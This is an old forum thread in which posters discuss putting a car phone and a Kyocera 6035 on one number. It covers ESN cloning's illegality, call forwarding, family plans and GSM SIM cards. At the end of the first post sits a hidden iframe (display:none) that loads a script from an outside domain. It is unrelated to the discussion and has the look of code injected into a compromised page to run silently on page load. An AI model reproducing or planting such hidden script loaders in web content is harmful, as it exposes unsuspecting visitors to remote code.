I have a dilemma. I just got a new (used) car and it has a phone in it (Time port Motorola) but I've love and need my 6035 and hopefully soon 7135. But I hate not to be able to use the car's built in phone features because I have the 6035 but I can't (don't want) to have 2 phone accounts. The perfect solution for me would be to ba able to have both phones have the same number but checking someplaces I have been told that there is "no way in heck" that's gonna happen. Strictly Verboden!
Other than greed by the phone cell companes to sell you all the equipment/service they can is there any (real, good) reason why this can't work? Seems logical to me.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
Get a 2nd number on the car phone, and set it to no answer transfer to your 6035. You can set these up on a "family" plan that shares the minutes on the same plan and it only costs 5-10 dollars to do this.
YOu could put your old number in the timport, then have it transfer to the new number in the 6035. You get all your calls to your 6035 still, and voicemail on your 6035. Just that all your calls will go through the car phone first. If you can set the phone to power down when the car shuts off, then the calls imediatly transfer when its off. Otherwise, your looking at 4-5 rings before it transfers.
Two phones with the same number would require them to have the same ESN, hence being cloaned....bad stuff that will get you put in jail
Thanks for the suggestions but I was interested in the "why" part on dupping the ESN's. I know this is the issue and it's illegal but I'm not sure I understand why other than just because. I mean if you still using minutes and paying for it, and the equipment why care? I guess it's just one of those things.
Easy Hot Sync - don't get to far up on the pedestal. My question was not poking at the legallity or duplicating ESN's rather why there isn't a way to support the convenience of having 2 phones. Doesn't sound harmful to me. I think the GSM phones in Europe with the removeable cards had a good idea and it allowed you to move from your mobile to you car phone without a problem. Yes I know the card had the same ESN but it allowed for the convenience. Anyway, you and I aren't going to change this in this forum but I wondered if anyone had ideas on how to work around the issue. Thanks for you suggestions again.
Another way to solve this is to perhaps switch over to GSM phones. The europeans have been used to several phones/one number. GSM phones use a SIM (subscriber id module) card that you can take out and use on another phone. When you do that, your new phone will be registered on the network for your phone number and you should have your old settings like contact list and such.
China has requested SIM capabilities from Qualcomm which developed CDMA technology, though there has been no interest from Verizon/Sprint in the US yet. I heard the Verizon susidiary in Mexico was interested in CDMA SIM phones.
It would be great if all US providers implemented SIM cards as switching carriers would be easy as pie, though because of that ease, no carrier is pushing this.

Very interesting, so the problem is not getting the same phone number but in whether or not the provider is willing to do it. I'll have to check it out. Thanks for the info.

Definately let us know what you find out, or, what you were able to accomplish.
My parents have cloned the phone in their motorhome with the one in their towed car. s'nice, because they only have 1 number when they are traveling. Their cellphone company is OK with it.

I currently use two phones on 1 account. When I got my 6035 I bought it outright and added it my existing account which had a Motorola Timeport. Verizon never disabled the Timeport. I have used both but have never tried both simoultaneously. I turn the one not in use off.

I can tell you that most providers Don't like to do it, but can do it, a friend of mine had a car phone, and his portable phone on the same number in Cingular, and you don't need to do any cloning, etc. to do this, they just add a second esn to your account, they do tell you that you should only have 1 phone on. This is not illegal at all, the question is wether Sprint or Verizon will let you do it. By the way, is the timeport CDMA, cause normally the installed phones in BMWs, audis, Mercedes, etc. are either AMPS or TDMA, in which case you wouldn't be able to activate on Sprint, and Verizon it depends on your area.
Well I called Verizon and they said it can't be done because their towers aren't smart enought to distinguish one phone from the other. I said what did that matter if they were both in my name. The gal said that if they got a call they wouldn't know which phone to send it to??? Which in translation I guess means I need to get further up the food chain to get a decent answer.
The "car" phone is a BMW phone by the way and the (the dealer) tells me they do Verizon so.....???
I too called VZ today, tried to get an older phone added, and did get moved up the food chain, basically to the division that handles Activations.
No. And it's not the towers. It's the system. But !!
I'd be willing to bet a buck, that there is someone on the face of this earth with a VZ account that has two phones on the same number. But just not for the public at large.
I did however, was able to activate my last phone on a plan that does'nt exist for the front line reps...
It's called the VZSAVE25 plan. They activation group refers to it as the Emergency Plan.
$15.00 a month
- 25 mins. Prime
- 250 N & W.
- I also added Mobile Web for $6.95
= $21.95
I can feel the questions coming, so i'll explaine now...
I'm building wap pages and my older phone (KY 2035a) has the standard Openwave that most other phones do. And so, I wanted to be able to test my pages against that phone in addition to the KY 6035.
The Openwave browser on the 6035 functions the same, but does not have the same dimensions. Hence the addition.
By the way, if you sign-up on any plan, and decide later you don't want the deal, you have a 15 day grace period in which to do so.

Oh well, thanks for the try. I've dispatched an email to their "contact the corporate office" customer service address to see if there is any additional help on this but I think as I stated before it's just that way because it is. I personally think there missing a way to make more money by allowing it.
